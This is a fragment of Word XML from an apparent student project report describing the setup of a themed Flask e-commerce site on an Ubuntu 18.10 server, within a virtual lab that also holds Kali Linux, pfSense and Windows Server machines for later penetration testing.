          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B169742" w14:textId="432D8951" w:rsidR="00022BA6" w:rsidRPr="00E9393E" w:rsidRDefault="00100DA1" w:rsidP="00022BA6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E9393E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Your final report is the Delivery Report presented to the client for final sign-off. The main body of the report should clearly show what has been delivered in comparison to the original prioritised Deliverables Map</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58593949" w14:textId="77777777" w:rsidR="00022BA6" w:rsidRPr="00E9393E" w:rsidRDefault="00022BA6" w:rsidP="00022BA6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BCB284B" w14:textId="77777777" w:rsidR="00022BA6" w:rsidRDefault="00022BA6" w:rsidP="00022BA6"/>
    <w:p w14:paraId="3DA3BC66" w14:textId="7E5F39A2" w:rsidR="00022BA6" w:rsidRDefault="00022BA6" w:rsidP="00022BA6"/>
    <w:p w14:paraId="2632EFFE" w14:textId="0B2DABBC" w:rsidR="00606117" w:rsidRDefault="00606117" w:rsidP="00022BA6"/>
    <w:p w14:paraId="7221F135" w14:textId="1B2F7B03" w:rsidR="00606117" w:rsidRDefault="00606117" w:rsidP="00022BA6"/>
    <w:p w14:paraId="078EE634" w14:textId="102210A4" w:rsidR="00606117" w:rsidRDefault="00606117" w:rsidP="00022BA6"/>
    <w:p w14:paraId="05E51C74" w14:textId="41813C72" w:rsidR="00606117" w:rsidRDefault="00606117" w:rsidP="00022BA6"/>
    <w:p w14:paraId="15F8C4FF" w14:textId="03AA2D7A" w:rsidR="00606117" w:rsidRDefault="00606117" w:rsidP="00022BA6"/>
    <w:p w14:paraId="329F55B2" w14:textId="25A7663B" w:rsidR="00606117" w:rsidRDefault="00606117" w:rsidP="00022BA6"/>
    <w:p w14:paraId="2209B3BC" w14:textId="69410604" w:rsidR="00606117" w:rsidRDefault="00606117" w:rsidP="00022BA6"/>
    <w:p w14:paraId="2FEE6FEA" w14:textId="77777777" w:rsidR="00D25AB7" w:rsidRDefault="00D25AB7" w:rsidP="00606117">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="109668BF" w14:textId="69279E3D" w:rsidR="00606117" w:rsidRPr="00CA3121" w:rsidRDefault="00606117" w:rsidP="00606117">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA3121">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">1: SUMMARY </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179C0C71" w14:textId="27956DDB" w:rsidR="00606117" w:rsidRDefault="00410D42" w:rsidP="00606117">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>~~~~Talk some guff~~~</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA42CF2" w14:textId="3D0DDD7A" w:rsidR="0094772C" w:rsidRDefault="0094772C" w:rsidP="00606117">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0094772C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>~~~~ project management measures that were in place~~~</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7904D825" w14:textId="6D897FD1" w:rsidR="00410D42" w:rsidRDefault="00410D42" w:rsidP="00606117">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>~~~compare completed Kanban with initiation Kanban~~~~</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2E4E43" w14:textId="5B03CB10" w:rsidR="00410D42" w:rsidRPr="00CA3121" w:rsidRDefault="00410D42" w:rsidP="00606117">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>~~~~all ‘must have‘ deliverables were met blah, blah, blah~~~~~</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753D122B" w14:textId="3FCC1FE0" w:rsidR="00606117" w:rsidRPr="00CA3121" w:rsidRDefault="00606117" w:rsidP="00606117">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA3121">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2: INITIAL DEVELOPMENT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495325B0" w14:textId="3C966F01" w:rsidR="00306832" w:rsidRPr="00D25AB7" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D25AB7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SERVER AND WEBSITE INITIAL SET-UP AND CONFIGURATION </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D9A7DB" w14:textId="77777777" w:rsidR="00306832" w:rsidRPr="00D25AB7" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D25AB7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OVERVIEW:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A094B02" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t xml:space="preserve">Following the specification of the Initial Report, the e-commerce website will be hosted in an Ubuntu 18.10 server, with the site architecture consisting of a python flask application running on Apache though the WSGI module. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318F6C63" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>WSGI (Web Server Gateway Interface) is a specification that describes the communication between web servers and Python web applications or frameworks. It explains how a web server communicates with python web applications/frameworks and how web applications/frameworks can be chained for processing a request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663DD194" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t xml:space="preserve">The initial template for the flask e-commerce has been provide by the GitHub page </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/bugtijamal/flaskecommerce</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6C9DFCC5" w14:textId="73A8188D" w:rsidR="00306832" w:rsidRDefault="007B216A" w:rsidP="00306832">
      <w:r>
        <w:t>Alterations to</w:t>
      </w:r>
      <w:r w:rsidR="00306832">
        <w:t xml:space="preserve"> the front</w:t>
      </w:r>
      <w:r w:rsidR="00846707">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00306832">
        <w:t xml:space="preserve">end of the site, changing the css, html and listed products </w:t>
      </w:r>
      <w:r>
        <w:t>all to the “antique weaponry” theme requested by the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FFBA34" w14:textId="52B11F39" w:rsidR="007B216A" w:rsidRPr="00327178" w:rsidRDefault="007B216A" w:rsidP="007B216A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00327178">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DOCUMENTATION OF FRONT-END CHANGES:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9717F0" w14:textId="77777777" w:rsidR="007B216A" w:rsidRPr="00CA3121" w:rsidRDefault="007B216A" w:rsidP="007B216A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA3121">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA3121">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Background altered to the military theme (Camo)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7E0AC3" w14:textId="77777777" w:rsidR="007B216A" w:rsidRPr="00CA3121" w:rsidRDefault="007B216A" w:rsidP="007B216A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA3121">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA3121">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Content updated to antique military theme</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146F93A3" w14:textId="77777777" w:rsidR="007B216A" w:rsidRPr="00CA3121" w:rsidRDefault="007B216A" w:rsidP="007B216A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA3121">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA3121">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Re-format navigation back to a user-friendly format (in progress)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177FA1EB" w14:textId="77777777" w:rsidR="007B216A" w:rsidRPr="00CA3121" w:rsidRDefault="007B216A" w:rsidP="007B216A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA3121">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA3121">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Font changed to a military style</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66778994" w14:textId="07DE6EFE" w:rsidR="007B216A" w:rsidRDefault="007B216A" w:rsidP="007B216A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA3121">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA3121">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Database updated with all the relevant categories, products and brands. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B54C177" w14:textId="285A45A6" w:rsidR="00641976" w:rsidRPr="00CA3121" w:rsidRDefault="00641976" w:rsidP="007B216A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C520D5F" wp14:editId="36FB3ED7">
            <wp:extent cx="5736590" cy="35052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3505200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1590C05A" w14:textId="7200E887" w:rsidR="007B216A" w:rsidRPr="00CA3121" w:rsidRDefault="007B216A" w:rsidP="007B216A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA3121">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The changes implemented to the existing e-commerce website included altering the previous content to a military theme which included altering all the previous items which where digital technology items to antique military equipment along with the overall visual design which I decided should include a camouflage style background. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D30091F" w14:textId="77777777" w:rsidR="007B216A" w:rsidRDefault="007B216A" w:rsidP="007B216A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA3121">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Further visual changes included altering the font that was more military themed and since altering the name it changed the format of the navigation bar making it look less professional and less easy to read. Further, alterations included updating the database so that it included all of the relevant categories, brands and products, this in turn meant removing all the irrelevant and content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5863C815" w14:textId="77777777" w:rsidR="007B216A" w:rsidRDefault="007B216A" w:rsidP="00306832"/>
    <w:p w14:paraId="36101FBB" w14:textId="63F960E4" w:rsidR="00306832" w:rsidRDefault="00327178" w:rsidP="00306832">
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00306832">
        <w:t>he server configuration and required backend website features</w:t>
      </w:r>
      <w:r>
        <w:t>, a</w:t>
      </w:r>
      <w:r w:rsidR="00E55B6A">
        <w:t>s discussed in the project initiation report section</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ‘2: PROJECT DESCRIPTION’</w:t>
      </w:r>
      <w:r w:rsidR="00E55B6A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00306832">
        <w:t>is implemented using four VMs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239E209A" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>Ubuntu 18.10 (running the flask e-commerce website)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04557B5B" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>Kali Linux 20.21.4a (penetration testing machine)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6A0981" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>Pfsense 2.5.2 (firewall and router)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FB8397" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>Windows server 2012(client machine)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF3F6A5" w14:textId="77777777" w:rsidR="00306832" w:rsidRPr="00D25AB7" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D25AB7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>IMPLEMENTATION:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A09891B" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>The Ubuntu Virtual machine has been deployed as a fresh installation using the 18.10 amd 64 desktop image</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADD8AE1" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00DF7185" w:rsidP="00306832">
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidR="00306832">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://old-releases.ubuntu.com/releases/18.10/ubuntu-18.10-desktop-amd64.iso</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1025AAD0" w14:textId="037AF291" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3302EF2D" wp14:editId="6F8F2ED9">
            <wp:extent cx="2565400" cy="2755900"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
            <wp:docPr id="57" name="Picture 5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applicati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5400" cy="2755900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1016B592" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>the initial user configuration is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52406ADE" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>username: projex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C50B5C5" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>password: projex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5A085B" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>those parameters are only for initial configuration, they may be changed before the actual penetration testing, as weak credential exploitation is not part of the scope of the project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFF50F8" w14:textId="18474D0D" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>The ubuntu 18.10 Long Term Support ended in 2020, that means it does no longer</w:t>
      </w:r>
      <w:r w:rsidR="00641917">
        <w:t xml:space="preserve"> receives any</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> software updates, however it is still widely used in server</w:t>
      </w:r>
      <w:r w:rsidR="00641917">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> deployed around 2018.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD1FFA0" w14:textId="43DC2DD2" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t xml:space="preserve">To provide compatible software it is necessary modify the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>source.list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> repository and add the old-releases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F488C8A" w14:textId="563AC122" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="129E5BC1" wp14:editId="75624695">
            <wp:extent cx="4457700" cy="347345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3473450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D448E29" w14:textId="26C84097" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>The repositories are loaded with the command</w:t>
      </w:r>
      <w:r w:rsidR="00F25059">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0E7077" w14:textId="1E99DDC0" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6032BCC0" wp14:editId="2CC1B718">
            <wp:extent cx="16764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14:paraId="46FD8090" w14:textId="7D68E44D" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>Then</w:t>
      </w:r>
      <w:r w:rsidR="00641917">
        <w:t>, a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> few software</w:t>
      </w:r>
      <w:r w:rsidR="00641917">
        <w:t xml:space="preserve"> additions</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ha</w:t>
      </w:r>
      <w:r w:rsidR="00641917">
        <w:t>ve to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> be installed to</w:t>
      </w:r>
      <w:r w:rsidR="00641917">
        <w:t xml:space="preserve"> allow for the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> download</w:t>
      </w:r>
      <w:r w:rsidR="00641917">
        <w:t>/clone of</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the GitHub e-commerce template and install python library</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0639ED68" w14:textId="74F0D446" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="157FF016" wp14:editId="6EA96E13">
            <wp:extent cx="1612900" cy="3302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2900" cy="330200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="77556121" w14:textId="5A3705EE" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>The flaskecommerce template is</w:t>
      </w:r>
      <w:r w:rsidR="00641917">
        <w:t xml:space="preserve"> next</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> clone</w:t>
      </w:r>
      <w:r w:rsidR="00641917">
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and all the required </w:t>
      </w:r>
      <w:r w:rsidR="00641917">
        <w:t>libraries</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00641917">
        <w:t xml:space="preserve">are </w:t>
      </w:r>
      <w:r>
        <w:t>installed</w:t>
      </w:r>
      <w:r w:rsidR="00641917">
        <w:t>. T</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">he website also need wkhtmltopdf to produce .pdf file for the </w:t>
      </w:r>
      <w:r w:rsidR="00641917">
        <w:t xml:space="preserve">generation </w:t>
      </w:r>
      <w:r>
        <w:t>customer orders and sqlitebrowser is an optional tool that allows to directly</w:t>
      </w:r>
      <w:r w:rsidR="00641917" w:rsidRPr="00641917">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00641917">
        <w:t>query</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the database of the e-commerce</w:t>
      </w:r>
      <w:r w:rsidR="00641917">
        <w:t xml:space="preserve"> site.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217C3197" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:object w:dxaOrig="5400" w:dyaOrig="1700" w14:anchorId="682A4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85pt" o:ole="">
            <v:imagedata r:id="rId16" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Paint.Picture" ShapeID="_x0000_i1025" DrawAspect="Content" ObjectID="_1710221365" r:id="rId17"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w14:paraId="34873869" w14:textId="32BCC52E" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>By running the web application via the command python3 run.py it is possible to enter in</w:t>
      </w:r>
      <w:r w:rsidR="00F25059">
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> development mode</w:t>
      </w:r>
      <w:r w:rsidR="00F25059">
        <w:t>. T</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">he website will by default run on localhost </w:t>
      </w:r>
      <w:r w:rsidR="00F25059">
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> port 5000</w:t>
      </w:r>
      <w:r w:rsidR="00F25059">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F25059">
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:t>unning the website in this way i</w:t>
      </w:r>
      <w:r w:rsidR="00F25059">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F25059">
        <w:t>ideal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F25059">
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> develop new feature</w:t>
      </w:r>
      <w:r w:rsidR="00F25059">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or troubleshoot</w:t>
      </w:r>
      <w:r w:rsidR="00F25059">
        <w:t xml:space="preserve"> issues,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> however this is not </w:t>
      </w:r>
      <w:r w:rsidR="00F25059">
        <w:t xml:space="preserve">strictly speaking </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">how a </w:t>
      </w:r>
      <w:r w:rsidR="00F25059">
        <w:t xml:space="preserve">production </w:t>
      </w:r>
      <w:r>
        <w:t>website should be deployed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428BE3B8" w14:textId="7ED50C38" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>To deploy the flask webapp Apache server and the wsgi-py3 mod</w:t>
      </w:r>
      <w:r w:rsidR="00246E1B">
        <w:t xml:space="preserve"> have been utilized. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BABDFF1" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:object w:dxaOrig="4220" w:dyaOrig="1100" w14:anchorId="395CD2DF">
          <v:shape id="_x0000_i1026" type="#_x0000_t75" style="width:211pt;height:55pt" o:ole="">
            <v:imagedata r:id="rId18" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Paint.Picture" ShapeID="_x0000_i1026" DrawAspect="Content" ObjectID="_1710221366" r:id="rId19"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBAC8B6" w14:textId="04D4A179" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t xml:space="preserve">The owner and group </w:t>
      </w:r>
      <w:r w:rsidR="00246E1B">
        <w:t xml:space="preserve">is next </w:t>
      </w:r>
      <w:r>
        <w:t>changed to www-data</w:t>
      </w:r>
      <w:r w:rsidR="00246E1B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B2D5BF" w14:textId="53DC57D8" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="391299B7" wp14:editId="441E2774">
